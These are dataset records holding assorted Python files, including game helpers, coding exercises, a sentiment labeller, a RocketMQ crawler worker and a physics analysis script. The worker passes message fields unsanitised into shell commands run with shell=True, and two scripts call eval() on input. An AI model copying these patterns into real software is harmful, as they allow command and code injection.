\"input_scroll_pos\")-self.Get(\"input_scroll_pos_old\"))\r\n self.Set(\"input_scroll_pos_old\", self.Get(\"input_scroll_pos\"))\r\n self.Set(\"input_mouse_pos_old\", self.Get(\"input_mouse_pos\"))\r\n\r\n def SetBounds(self, bounds):\r\n self.Set(\"bounds\", bounds)\r\n s_x = self.Get(\"size\")[0] / (bounds[1]-bounds[0])\r\n s_y = self.Get(\"size\")[1] / (bounds[2]-bounds[3])\r\n o_x = (bounds[0]*self.Get(\"size\")[0]) / (bounds[0] - bounds[1])\r\n o_y = self.Get(\"size\")[\r\n 1] + ((bounds[2]*self.Get(\"size\")[1])/(bounds[3]-bounds[2]))\r\n self.Set(\"point_matrix\", np.array(\r\n [[s_x, 0, o_x], [0, s_y, o_y], [0, 0, 1]]))\r\n self.Set(\"dist_matrix\", np.array([[s_x, 0], [0, s_y]]))\r\n\r\n def IsInWindow(self, point):\r\n pos = self.Get(\"point_matrix\").dot(np.append(point, [1]))\r\n if (pos[0] < 0 or pos[0] > self.Get(\"size\")[0]):\r\n if (pos[1] < 0 or pos[1] > self.Get(\"size\")[1]):\r\n return True\r\n return False\r\n\r\n def DrawCircle(self, colour, center, radius, filled=True):\r\n pos = self.Get(\"point_matrix\").dot(np.append(center, [1]))\r\n size = self.Get(\"dist_matrix\").dot(np.array([radius, radius]))\r\n if (filled):\r\n pygame.gfxdraw.filled_ellipse(self.Get(\"display\"), int(pos[0]), int(\r\n pos[1]), int(abs(size[0])), int(abs(size[1])), colour)\r\n pygame.gfxdraw.aaellipse(self.Get(\"display\"), int(pos[0]), int(\r\n pos[1]), int(abs(size[0])), int(abs(size[1])), colour)\r\n\r\n def FilledRect(self, colour, center, size, is_numpy=True, dest=None):\r\n surf = self.Get(\"display\")\r\n if dest != None:\r\n surf = dest\r\n pos = center\r\n if (is_numpy):\r\n pos = self.Get(\"point_matrix\").dot(np.append(center, [1]))\r\n size = self.Get(\"dist_matrix\").dot(size)\r\n pygame.draw.rect(\r\n surf, colour, [pos[0]-size[0]/2.0, pos[1]-size[1]/2.0, size[0], size[1]])\r\n\r\n def DrawText(self, colour, pos, size, string, back_colour=None, dest=None, angle = 0.0):\r\n surf = self.Get(\"display\")\r\n if dest != None:\r\n surf = dest\r\n self.Set(\"font\", pygame.font.Font(\r\n pygame.font.get_default_font(), size))\r\n text = self.Get(\"font\").render(string, True, colour, back_colour)\r\n text = pygame.transform.rotate(text,angle)\r\n surf.blit(text, [pos[0], pos[1]])\r\n\r\n def Quit(self):\r\n pygame.display.quit()\r\n pygame.quit()\r\n self.Set(\"isClosing\", 1)\r\n","sub_path":"PyGUtil.py","file_name":"PyGUtil.py","file_ext":"py","file_size_in_byte":33334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"55178263","text":"\"\"\"\nA square hitbox for entities to detect collisions.\n\"\"\"\nimport tkinter as tk\nfrom random import randint\n\n\nclass Hitbox:\n def __init__(self, x, y, width, height):\n self.__width = abs(width)\n self.__height = abs(height)\n self.__x = x\n self.__y = y\n\n self.__canvas = None\n self.__id = None\n\n def collidesWith(self, hitbox):\n \"\"\"\n Checks if this instance of a hitbox collides with the one given as a parameter\n Instead of checking whether they collide, the function checks if they DON'T collide and\n returns a negated boolean instead. It's easier this way.\n :param hitbox: Hitbox object\n :return: True if it collides with the given hitbox\n \"\"\"\n x_doesnt_collide = self.__x + self.__width < hitbox.getX() if self.__x < hitbox.getX() \\\n else hitbox.getX() + hitbox.getWidth() < self.__x\n y_doesnt_collide = self.__y + self.__height < hitbox.getY() if self.__y < hitbox.getY() \\\n else hitbox.getY() + hitbox.getHeight() < self.__y\n\n return not x_doesnt_collide and not y_doesnt_collide\n\n def move(self, x=0, y=0):\n \"\"\"\n Moves the hitbox\n :param x: the amount of pixels to move the hitbox on the X axis\n :param y: the amount of pixels to move the hitbox on the Y axis\n \"\"\"\n self.__x += x\n self.__y += y\n\n if self.__id:\n self.__canvas.move(self.__id, x, y)\n\n # Setters\n\n def setX(self, x):\n self.__x = x\n\n def setY(self, y):\n self.__y = y\n\n def setWidth(self, width):\n self.__width = width\n\n def setHeight(self, height):\n self.__height = height\n\n # Getters\n\n def getX(self):\n return self.__x\n\n def getY(self):\n return self.__y\n\n def getWidth(self):\n return self.__width\n\n def getHeight(self):\n return self.__height\n\n # Debug\n\n def display(self, canvas: tk.Canvas):\n \"\"\"\n Displays the hitbox as a black square in the given canvas\n :param canvas: A Tkinter Canvas object\n \"\"\"\n if not self.__canvas:\n self.__canvas = canvas\n self.__id = canvas.create_polygon(self.__x, self.__y,\n self.__x + self.__width, self.__y,\n self.__x + self.__width, self.__y + self.__height,\n self.__x, self.__y + self.__height,\n fill=\"#222222\")\n\n def hide(self):\n \"\"\"\n Hides the hitbox if display has been called before\n \"\"\"\n if self.__id:\n self.__canvas.delete(self.__id)\n self.__canvas = None\n self.__id = None\n\n\nif __name__ == '__main__':\n \"\"\"Collision test\"\"\"\n root = tk.Tk()\n\n do_they_collide = tk.Label(root)\n do_they_collide.pack()\n\n canvas = tk.Canvas(root, width=500, height=500, bg=\"gray\")\n canvas.pack()\n\n X1, X2 = 150, 250\n Y1, Y2 = 150, 50\n WIDTH1, WIDTH2 = 200, 200\n HEIGHT1, HEIGHT2 = 100, 300\n\n hb1 = Hitbox(X1, Y1, WIDTH1, HEIGHT1)\n hb1.display(canvas)\n\n hb2 = Hitbox(X2, Y2, WIDTH2, HEIGHT2)\n hb2.display(canvas)\n\n do_they_collide[\"text\"] = str(hb1.collidesWith(hb2))\n \n root.mainloop()\n","sub_path":"objects/hitbox.py","file_name":"hitbox.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"250103086","text":"a=eval(input())\nnum=len(a)\nmax1=-10000000\nif num==1:\n print(a[0])\nelse:\n for i in range(0,num):\n kk=a[i]\n for j in range(i+1,num):\n kk=kk+a[j]\n if kk>max1:\n max1=kk\n print(max1)","sub_path":"Code/CodeRecords/2621/47961/248463.py","file_name":"248463.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"494600649","text":"from tokenizer import parser\n# from decimal import Decimal as dcm\nimport csv\n__author__ = 'Zhenwei Wang, wangzw1@live.unc.edu, Onyen = wangzw1'\n\n# this is the main class to handle the sentiment labeling process\n# when a review is sent into the tokenizer, it first process the text\n# for positive/negative scoring using SentiWordNet corpus.\n# after that the original label of the movie review is used for reference.\n\n\ndef sentimentlabel(initfile):\n procfile = open(initfile, encoding = \"ISO-8859-1\")\n reader = csv.DictReader(procfile, delimiter=',')\n list = []\n working_file = open('4_class_imdb_pred.csv', 'w')\n working_file.write(\"sentence,label\\n\")\n for row in reader:\n list.append(row)\n # for i in range(5):\n for i in range(len(list)):\n result = parser(list[i]['sentence'])\n if list[i][\"label\"] == \"1\": # positive\n outcome = pos_identifier(result[0],result[1])\n elif list[i][\"label\"] == \"0\": # negative\n outcome = neg_identifier(result[1],result[0])\n\n working_file.write('\"'+list[i][\"sentence\"]+'\",'+outcome+'\\n')\n working_file.close()\n print(\"Save Done\")\n\n\ndef neg_identifier(inita,initb):\n if inita-initb<0.02:\n outcome = \"somewhat negative\"\n else: outcome = \"negative\"\n return outcome\n\n\ndef pos_identifier(inita,initb):\n if inita-initb<0.02:\n outcome = \"somewhat positive\"\n else: outcome = \"positive\"\n return outcome\n\nsentimentlabel(\"imdb_labelled.csv\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"8976078","text":"import threading\n\nc = 0\nSum = 10000\n\nlock = threading.Lock()\n\ndef myAdd():\n global c, Sum\n for i in range(1, Sum):\n #上锁,申请锁\n lock.acquire()\n c += 1\n #解锁\n lock.release()\n\ndef myMinu():\n global c, Sum\n for i in range(1, Sum):\n lock.acquire()\n c -= 1\n lock.release()\n\n\nif __name__ == '__main__':\n print('Staring....%d' %c)\n\n t1 = threading.Thread(target=myAdd(), args=())\n t2 = threading.Thread(target=myMinu(), args=())\n\n t1.start()\n t2.start()\n\n t1.join()\n t2.join()\n\n print('Done....%d' %c)","sub_path":"多线程/案例10.py","file_name":"案例10.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"649760440","text":"\"\"\"\nLeetCode 819. Most Common Word\nurl: https://leetcode.com/problems/most-common-word/\nwriter: Harim Kang\nLanguage: Python3\nDate: 2020.08.28\nStatus: Success, Runtime: 36 ms, Memory Usage: 14 MB\n\"\"\"\nimport re\nimport collections\n\n\nclass Solution:\n def mostCommonWord(self, paragraph, banned):\n word = [\n w\n for w in re.sub(r\"[^\\w]\", \" \", paragraph).lower().split()\n if w not in banned\n ]\n count = collections.Counter(word)\n answer = count.most_common(1)[0][0]\n\n return answer\n\n\nif __name__ == \"__main__\":\n paragraph = \"Bob hit a ball, the hit BALL flew far after it was hit.\"\n banned = [\"hit\"]\n print(Solution().mostCommonWord(paragraph, banned))\n","sub_path":"leetcode/string_manipulation/most_common_word.py","file_name":"most_common_word.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"455562128","text":"#用来保存学生的所有信息\nstuInfos = []\n\n#全局变量\n#newName = \"\"\n#newSex = \"\"\n#newPhone = \"\"\n\n#打印功能提示\ndef printMenu():\n print(\"=\"*30)\n print(\" 学生管理系统V1.0\")\n print(\"1. 添加学生信息\")\n print(\"2. 删除学生信息\")\n print(\"3. 修改学生信息\")\n print(\"4. 查询学生信息\")\n print(\"5. 显示所有学生信息\")\n print(\"6. 保存数据\")\n print(\"0. 退出系统\")\n print(\"=\"*30)\n\n#获取一个学生的信息\n\ndef getInfo():\n\n# global newName\n# global newSex\n# global newPhone\n\n #3.1 提示并获取学生的姓名\n newName = input(\"请输入新学生的名字:\")\n\n #3.2 提示并获取学生的性别\n newSex = input(\"请输入新学生的性别:(男/女)\")\n\n #3.3 提示并获取学生的手机号码\n newPhone = input(\"请输入新学生的手机号码:\")\n\n #通过列表的方式把数据整合成一个整体,然后返回\n #return [newName, newSex, newPhone]\n #通过元组的方式把数据整合成一个整体,然后返回\n #return (newName, newSex, newPhone)\n return {\"name\":newName, \"sex\":newSex, \"phone\":newPhone}\n \n\n\n#添加一个新学生的信息\ndef addStuInfo():\n \n result = getInfo() #[\"aaaa\",\"男\",\"10086\"]\n\n newInfo = {}\n # newInfo['name'] = result[0]\n # newInfo['sex'] = result[1]\n # newInfo['phone'] = result[2]\n newInfo['name'] = result[\"name\"]\n newInfo['sex'] = result[\"sex\"]\n newInfo['phone'] = result[\"phone\"]\n\n stuInfos.append(newInfo)\n \n#用来修改一个学生的信息\ndef modifyStuInfo():\n #3.1 提示并获取需要修改的学生序号\n stuId = int(input(\"请输入要修改的学生的序号:\"))\n\n result = getInfo()\n\n stuInfos[stuId-1]['name'] = result['name']\n stuInfos[stuId-1]['sex'] = result['sex']\n stuInfos[stuId-1]['phone'] = result['phone']\n\n\n#保存当前所有的学生信息到文件中\ndef save2file():\n\n f = open(\"backup.data\",\"w\")\n\n #[{},{},{}]\n f.write(str(stuInfos))\n\n\n f.close()\n\n\n#恢复数据\ndef recoverData():\n global stuInfos\n f = open(\"backup.data\")\n content = f.read()\n stuInfos = eval(content)\n #print(stuInfos)\n f.close()\n\n\ndef main():\n\n #恢复之前的数据\n recoverData()\n\n\n print(stuInfos)\n\n\n\n while True:\n #1. 打印功能提示\n printMenu()\n\n #2. 获取功能的选择\n key = input(\"请输入功能对应的数字:\")\n\n #3. 根据用户的选择,进行相应的操作\n if key==\"1\":\n #添加学生信息\n addStuInfo()\n\n elif key == '3':\n #修改学生的信息\n modifyStuInfo()\n\n elif key == '5':\n #print(stuInfos)\n print(\"=\"*30)\n print(\"学生的信息如下:\")\n print(\"=\"*30)\n\n print(\"序号 姓名 性别 手机号码\")\n i = 1\n for tempInfo in stuInfos:\n print(\"%d %s %s %s\"%(i, tempInfo['name'], tempInfo['sex'], tempInfo['phone'] ))\n i+=1\n elif key=='6':\n #保存数据到文件中\n save2file()\n\n\n\n#调用主函数\nmain()\n","sub_path":"文件/10-学生管理系统-4-文件.py","file_name":"10-学生管理系统-4-文件.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"322507247","text":"from ScoutSpyder.rocket import init_push_consumer\nfrom ScoutSpyder.utils.logging import initialise_logging\nfrom os import environ\nfrom rocketmq.client import ConsumeStatus\nfrom time import sleep\nimport argparse\nimport json\nimport signal\nimport subprocess\n\nLOGGER = initialise_logging('ScoutSpyder.rocket')\nTERMINATED = False\n\ndef read_arguments():\n parser = argparse.ArgumentParser(description='ScoutSpyder RocketMQ Worker')\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\n '-s', '--single', action='store_true', default=False,\n help='Only listen for single crawl events'\n )\n group.add_argument(\n '-b', '--batch', action='store_true', default=False,\n help='Only listen for batch crawl events'\n )\n return parser.parse_args()\n\ndef signal_handler(signal, frame):\n global TERMINATED\n LOGGER.info('Termination signal received...')\n TERMINATED = True\n\ndef setup_signal_handler():\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n\ndef start_crawler(message):\n body = json.loads(message.body)\n type_ = body.get('type') or 'manual'\n crawl_id = body.get('crawl_id')\n duration = body.get('duration')\n environments = body.get('environments') or []\n activated_crawlers = body.get('activatedCrawlers') or []\n env_vars = environ.copy()\n for env in environments:\n env_vars.update( { env.get('name'): env.get('value') } )\n \n if activated_crawlers:\n activated_crawlers = ', '.join(activated_crawlers)\n subprocess.Popen(f'python main.py -id {crawl_id} -d {duration} -t {type_} -c \"{activated_crawlers}\"', start_new_session=True, env=env_vars, shell=True)\n else:\n subprocess.Popen(f'python main.py -id {crawl_id} -d {duration} -t {type_}', start_new_session=True, env=env_vars, shell=True)\n return ConsumeStatus.CONSUME_SUCCESS\n\ndef start_single_crawler(message):\n body = json.loads(message.body)\n article_id = body.get('article_id')\n subprocess.Popen(f'python main_single.py -i {article_id}', start_new_session=True, env=environ, shell=True)\n return ConsumeStatus.CONSUME_SUCCESS\n\n# PushConsumer subscribe function memoization causes\n# issues with have different callback functions\ndef start_callback(message):\n tag = message.tags.decode()\n if tag == 'crawler.internal.cmd.start':\n return start_crawler(message)\n elif tag == 'crawler_single.cmd.start':\n return start_single_crawler(message)\n return ConsumeStatus.CONSUME_SUCCESS\n\ndef main():\n args = read_arguments()\n LOGGER.info('Starting worker process...')\n\n if args.single or args.batch:\n if args.single:\n consumer = init_push_consumer('crawler-single')\n consumer.subscribe('crawler_single', start_callback, 'crawler_single.cmd.start')\n LOGGER.info('Listening for single crawl events only...')\n else:\n consumer = init_push_consumer('crawler-batch')\n consumer.subscribe('crawler', start_callback, 'crawler.internal.cmd.start')\n LOGGER.info('Listening for batch crawl events only...')\n else:\n consumer = init_push_consumer('crawler')\n consumer.subscribe('crawler', start_callback, 'crawler.internal.cmd.start')\n consumer.subscribe('crawler_single', start_callback, 'crawler_single.cmd.start')\n LOGGER.info('Listening for all crawl events...')\n\n LOGGER.info('Starting consumption loop...')\n consumer.start()\n while not TERMINATED:\n sleep(15)\n LOGGER.info('Terminating...')\n consumer.shutdown()\n\nif __name__ == '__main__':\n setup_signal_handler()\n main()","sub_path":"Backend/main_rocket.py","file_name":"main_rocket.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"315571749","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom pytest import raises\n\n\ndef test_non_ascii_bytes_fail_without_encoding(harness):\n raises(UnicodeDecodeError, harness.simple, (\"\"\"\n [------------------]\n text = u'א'\n [------------------]\n %(text)s\n \"\"\", 'utf8'))\n\ndef test_non_ascii_bytes_work_with_encoding(harness):\n expected = 'א'.encode('utf8')\n actual = harness.simple((\"\"\"\n # encoding=utf8\n [------------------]\n text = u'א'\n [------------------]\n %(text)s\n \"\"\", 'utf8')).body.strip()\n assert actual == expected\n\ndef test_the_exec_machinery_handles_two_encoding_lines_properly(harness):\n expected = 'א'.encode('utf8')\n actual = harness.simple((\"\"\"\\\n # encoding=utf8\n # encoding=ascii\n [------------------]\n text = u'א'\n [------------------]\n %(text)s\n \"\"\", 'utf8')).body.strip()\n assert actual == expected\n","sub_path":"tests/test_unicode.py","file_name":"test_unicode.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"417834202","text":"#!/usr/local/bin/python3\n'''\nTests the MultiPeakTrack Analysis using some Summer 2015 data.\n\nRun this inside an interactive shell:\nipython --pylab\nrun session_20160615_Test_MultiPeakAnalysis_Vars_forLuis.py\n'''\n\n###############################################################################\n# Import Libraries\n\nimport KatydidHDF5IO\nimport P8RunParamsDB\nimport P8MiscAnalysis as ana\nimport P8Plotters\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom scipy import optimize\nimport os\nfrom scipy.stats import norm\nimport sys\n\n\n\n###############################################################################\n# Select which dataset to load\nflag_dataset_nb = 1\n\n#if flag_dataset_nb == 1:\n# run_name = '20150811T0040_BotCoil1000mA_TopCoil1000mA_CF1065MHz' # 32 keV dataset Summer run\n # corresponds to run_id = 222\nrun_id = 294\n\n###############################################################################\n# Plot options\nflag_save_fig = False\nflag_compare_MPA_vars = True\nflag_show_tcut = True\nflag_study_sidebands = True\nflag_look_at_sidebands = True\nflag_normalize = True\nflag_show_uncut=True\nflag_apply_cut_t=True\nflag_Luis = True\nt_range_margins = [-0.1,0.5];\nxmargins_ehist = [-0.300,+0.030]\nebins_w = 0.001/5\nhisttype1 = 'step'\nlw1 = 2\n\nsavefig_path = 'figs_20160614'\n\n\n###############################################################################\n# Analysis Parameters\ntlen_thresh_ms = 8.9\nnb_fit_points = 30\n\n\n###############################################################################\n# Initialize analysis\n\n\n# Load data from HDF5 file\nrun_params = P8RunParamsDB.RunParams(run_id)\nP8RunParamsDB.AnalysisSpecificParams(run_params);\ndata = KatydidHDF5IO.ConcatedEventHDF5ToDict(run_params['final_hdf5_fullname'])\n\n# Set the magnetic field calibration manually for now\n# -> this should be stored in the database eventually\n# Note: This is the custom calibration for the bathtup trap high stats data set from summer 2015 \n# For the harmonic trap, the calibration is B_magnet = 0.9583 T and b_coil = 0.0042 T/A.\nif (run_params['peak_e_keV']==30.48) & (run_params['run_id']==8):\n run_params['b_avg_total_T'] = 0.95843 - (8.6e-3 * 0.004)\nif (run_params['peak_e_keV']==30.48) & (run_params['run_id']>100):\n run_params['b_avg_total_T'] = 0.95843 - (8.6e-3 * 0.000)\nif run_params['peak_e_keV']==32:\n run_params['b_avg_total_T'] = 0.95843 - (8.6e-3 * 0.001)\nif run_params['peak_e_keV']==17.83:\n run_params['b_avg_total_T'] = 0.9583 - (8.1e-3 * 0.100/2.000)\n#if run_params['peak_e_keV']==17.83:\n# run_params['b_avg_total_T'] = 0.8945\n\n# Convert Frequency Energy\nana.Freq2EnergyData(data, run_params)\n# Calculate Livetime\nana.CalculateLivetime(data)\n\n# Energy bins for histograms\nif (run_params['peak_e_keV'] == 30.48) | (run_params['peak_e_keV'] == 30.43):\n ebins_edges = np.arange(29,31,ebins_w)\nif run_params['peak_e_keV'] == 32:\n ebins_edges = np.arange(20,40,ebins_w)\nif run_params['peak_e_keV'] == 17.83:\n ebins_edges = np.arange(16,20,ebins_w)\nebins_centers = (ebins_edges[:-1] + ebins_edges[1:]) / 2\n\n# Miscellaneous\nordinal = lambda n: \"%d%s\" % (n,\"tsnrhtdd\"[(n/10%10!=1)*(n%10<4)*n%10::4])\n\n###############################################################################\n# Prepare filename for figures\nif not os.path.exists(savefig_path):\n os.makedirs(savefig_path)\n\nfigname1 = os.path.join(os.path.abspath(savefig_path),('K_MPAnalysis_v1_runid%06d' % run_params['run_id']))\nif flag_show_uncut:\n figname1+='_all'\nif flag_apply_cut_t:\n figname1+='_tcut'\nif not flag_normalize:\n figname1+='_cts'\n\n\n###############################################################################\n# Create Cuts that will be applied to the data\n\ncut_good = np.ones(np.size(data['candidates']['StartTimeInAcq']), dtype=bool)\n\n# Define Track StartTime Cut\nt_range = run_params['pretrigger_time']*1e3 + np.array(t_range_margins)\ncut_t = (data['candidates']['StartTimeInAcq']*1e3>=t_range[0]) & (data['candidates']['StartTimeInAcq']*1e3<=t_range[1])\nif flag_apply_cut_t:\n cut_good = (cut_good) & (cut_t)\n\nana.MultiPeakAnalysisAdditionalVars(data,run_params)\n\n\n\n###############################################################################\n###############################################################################\n###############################################################################\n\n\n# Plots\n\n\n# Global definitions\nfbins_min = data['metadata']['minimum_frequency'][0]/1e6\nfbins_max = data['metadata']['maximum_frequency'][0]/1e6\nfbins_w = 1/2\nfbins_MHz = np.arange(fbins_min,fbins_max+fbins_w,fbins_w)\n\n\n###############################################################################\n# Compare the Multi-Peak Analysis Cuts\nif flag_compare_MPA_vars:\n plt.figure(10)\n plt.clf()\n max_counts_in_fbins = 0\n\n xdata = data['candidates']['StartFrequency']/1e6+fbins_min\n if True:\n label_str = \"data['candidates']['StartFrequency']\"\n counts_in_fbins, fbins_edges, patches_temp = \\\n plt.hist(xdata,fbins_MHz,histtype=histtype1,linewidth=lw1,label=label_str)\n max_counts_in_fbins = np.max([max_counts_in_fbins]+list(counts_in_fbins))\n\n if True:\n cut_tracks = (data['candidate_tracks']['EventSequenceID']==0)\n xdata = data['candidate_tracks']['StartFrequency'][cut_tracks]/1e6+fbins_min\n label_str = 'EventSequenceID=0'\n counts_in_fbins, fbins_edges, patches_temp = \\\n plt.hist(xdata,fbins_MHz,histtype=histtype1,linewidth=lw1,label=label_str)\n max_counts_in_fbins = np.max([max_counts_in_fbins]+list(counts_in_fbins))\n\n if True:\n cut_tracks = (data['candidate_tracks']['EventSequenceID']==0) & (data['candidate_tracks']['MultiPeakTracks_OrderByInput']==0)\n xdata = data['candidate_tracks']['StartFrequency'][cut_tracks]/1e6+fbins_min\n label_str = 'EventSequenceID=0 & MultiPeakTracks_OrderByInput=0'\n counts_in_fbins, fbins_edges, patches_temp = \\\n plt.hist(xdata,fbins_MHz,histtype=histtype1,linewidth=lw1,label=label_str)\n max_counts_in_fbins = np.max([max_counts_in_fbins]+list(counts_in_fbins))\n\n if False:\n cut_tracks = (data['candidate_tracks']['MultiPeakTracks_EventFirstTrack']==True)\n xdata = data['candidate_tracks']['StartFrequency'][cut_tracks]/1e6+fbins_min\n label_str = 'MultiPeakTracks_EventFirstTrack=True'\n counts_in_fbins, fbins_edges, patches_temp = \\\n plt.hist(xdata,fbins_MHz,histtype=histtype1,linewidth=lw1,label=label_str,linestyle='--')\n max_counts_in_fbins = np.max([max_counts_in_fbins]+list(counts_in_fbins))\n\n if True:\n cut_tracks = (data['candidate_tracks']['EventSequenceID']==0) & (data['candidate_tracks']['MultiPeakTracks_OrderByTime']==0)\n xdata = data['candidate_tracks']['StartFrequency'][cut_tracks]/1e6+fbins_min\n label_str = 'EventSequenceID=0 & MultiPeakTracks_OrderByTime=0'\n counts_in_fbins, fbins_edges, patches_temp = \\\n plt.hist(xdata,fbins_MHz,histtype=histtype1,linewidth=lw1,label=label_str,linestyle='--')\n max_counts_in_fbins = np.max([max_counts_in_fbins]+list(counts_in_fbins))\n\n if False:\n cut_tracks = (data['candidate_tracks']['EventSequenceID']==0) & (data['candidate_tracks']['MultiPeakTracks_OrderByFreq']==0)\n xdata = data['candidate_tracks']['StartFrequency'][cut_tracks]/1e6+fbins_min\n label_str = 'EventSequenceID=0 & MultiPeakTracks_OrderByFreq=0'\n counts_in_fbins, fbins_edges, patches_temp = \\\n plt.hist(xdata,fbins_MHz,histtype=histtype1,linewidth=lw1,label=label_str,linestyle='--')\n max_counts_in_fbins = np.max([max_counts_in_fbins]+list(counts_in_fbins))\n\n\n plt.title(\"Frequency Histogram - %d Events, %0.01f sec livetime\" % (len(data['candidates']['StartFrequency']),data['metadata']['livetime']))\n plt.xlabel(\"Track Frequency [MHz]\")\n plt.ylabel(\"Counts\")\n plt.legend(loc='upper right')\n plt.xlim(fbins_min, fbins_max)\n plt.ylim(0, round(max_counts_in_fbins/50)*50)\n plt.grid(True)\n plt.ticklabel_format(useOffset=False)\n if flag_save_fig:\n plt.gcf().set_size_inches(15,5)\n figname2 = figname1+'_CompareMPAVars'\n plt.savefig(figname2+'.pdf',format='pdf',pad_inches=0.1)\n plt.show()\n\n\n###############################################################################\n\nif flag_show_tcut:\n plt.figure(20)\n plt.clf()\n max_counts_in_fbins = 0\n\n xdata = data['candidate_tracks']['StartFrequency']/1e6+fbins_min\n cut_track_0 = (data['candidate_tracks']['EventSequenceID']==0) & (data['candidate_tracks']['MultiPeakTracks_OrderByTime']==0)\n cut_good = cut_track_0\n if flag_show_uncut:\n label_str = 'all'\n counts_in_fbins, fbins_edges, patches_temp = \\\n plt.hist(xdata[cut_good],fbins_MHz,histtype=histtype1,linewidth=lw1,label=label_str)\n max_counts_in_fbins = np.max([max_counts_in_fbins]+list(counts_in_fbins))\n\n if flag_apply_cut_t:\n cut_t = (data['candidate_tracks']['StartTimeInAcq']*1e3>=t_range[0]) & (data['candidate_tracks']['StartTimeInAcq']*1e3<=t_range[1])\n cut_good = cut_good & cut_t\n label_str = 't = %0.1f - %0.1f ms' % (t_range[0],t_range[1])\n counts_in_fbins, fbins_edges, patches_temp = \\\n plt.hist(xdata[cut_good],fbins_MHz,histtype=histtype1,linewidth=lw1,label=label_str)\n max_counts_in_fbins = np.max([max_counts_in_fbins]+list(counts_in_fbins))\n if True:\n # Display stats about the time cut\n\n # First, find peak, and select only events within a frequecy range around the peak\n f_range_1_margins_MHz = np.array([-5,+35])\n f_range_2_margins_MHz = np.array([-1,+1])\n fbins_centers = (fbins_edges[:-1] + fbins_edges[1:]) / 2\n f_max_counts_MHz = fbins_centers[np.argmax(counts_in_fbins)]\n f_range_1_MHz = f_max_counts_MHz+f_range_1_margins_MHz\n f_range_2_MHz = f_max_counts_MHz+f_range_2_margins_MHz\n cut_f_range_1 = (xdata>f_range_1_MHz[0]) & (xdataf_range_2_MHz[0]) & (xdata=t_range[0]) & (data['candidate_tracks']['StartTimeInAcq']*1e3<=t_range[1])\n\n # Results\n results = {}\n results['mu'] = np.zeros((max_nb_tracks,max_nb_tracks))\n results['sigma'] = np.zeros_like(results['mu'])\n results['FWHM'] = np.zeros_like(results['mu'])\n\n\n for nb_tracks in np.arange(1,max_nb_tracks_user+1):\n if nb_tracks==1:\n fbins_w = 1/5\n if nb_tracks==2:\n fbins_w = 1/2\n if nb_tracks==3:\n fbins_w = 1/2\n fbins_MHz = np.arange(fbins_min,fbins_max+fbins_w,fbins_w)\n cut_nb_tracks = (data['candidate_tracks']['MultiPeakTracks_Total']==nb_tracks)\n print('nb_tracks: '+str(nb_tracks))\n max_counts_in_fbins = 0\n for track_n in range(nb_tracks):\n cut_track_n = data['candidate_tracks']['MultiPeakTracks_OrderByFreq']==track_n\n cut_seq = data['candidate_tracks']['EventSequenceID']==0\n cut_good = cut_t & cut_seq & cut_nb_tracks & cut_track_n;\n xpoints = nb_tracks*np.ones(sum(cut_track_n))+0.1*np.random.randn(sum(cut_track_n))\n tracks_freq = data['candidate_tracks']['StartFrequency'][cut_good]/1e6+fbins_min\n print('track_n: %d (%d tracks, mean=%0.1f)' % (track_n,sum(cut_good),np.mean(tracks_freq)))\n if flag_MPT_show_points:\n plt.figure(30)\n plt.plot(xpoints,tracks_freq,'.',color=colorlist[track_n])\n if flag_MPT_show_hists:\n plt.figure(40)\n plt.subplot(nb_colors,1,nb_tracks)\n counts_in_fbins, fbins_edges, patches_temp = \\\n plt.hist(tracks_freq,fbins_MHz,color=colorlist[track_n],histtype=histtype1)\n max_counts_in_fbins = np.max([max_counts_in_fbins]+list(counts_in_fbins))\n fbins_centers = (fbins_edges[:-1] + fbins_edges[1:]) / 2\n if flag_MPT_apply_fit:\n # Use maximum bin as a first guess\n coeff0 = [np.max(counts_in_fbins),fbins_centers[np.argmax(counts_in_fbins)],fbins_w*3]\n # Fit the Peak\n coeff, var_matrix = optimize.curve_fit(ana.gauss, fbins_centers, counts_in_fbins,coeff0)\n ax=plt.axis()\n xx = np.arange(ax[0],ax[1],fbins_w)\n gauss_fit_y = ana.gauss(xx, *coeff)\n mu_MHz = coeff[1]\n sigma_MHz = coeff[2]\n FWHM_MHz = 2*np.sqrt(2*np.log(2)) * coeff[2]\n #label_str = '$\\mu$ = %0.1f MHz, FWHM = %0.1f MHz' % (mu_MHz,FWHM_MHz)\n label_str = '%s track: $\\mu$ = %0.1f MHz, $\\sigma$ = %0.1f MHz' % (ordinal(track_n+1),mu_MHz,sigma_MHz)\n linehandle1 = plt.plot(xx, gauss_fit_y, '--', color=colorlist[track_n], linewidth=lw1, label=label_str )\n results['mu'][nb_tracks][track_n] = mu_MHz\n results['sigma'][nb_tracks][track_n] = sigma_MHz\n results['FWHM'][nb_tracks][track_n] = FWHM_MHz\n if flag_MPT_show_hists:\n fbins_center = (fbins_max+fbins_min)/2\n plt.grid(True)\n plt.xlim([fbins_center-70,fbins_center+50])\n plt.ylim(0, max(16,np.ceil(max_counts_in_fbins/5)*5))\n ax = plt.axis()\n plt.xlabel(\"Track Frequency 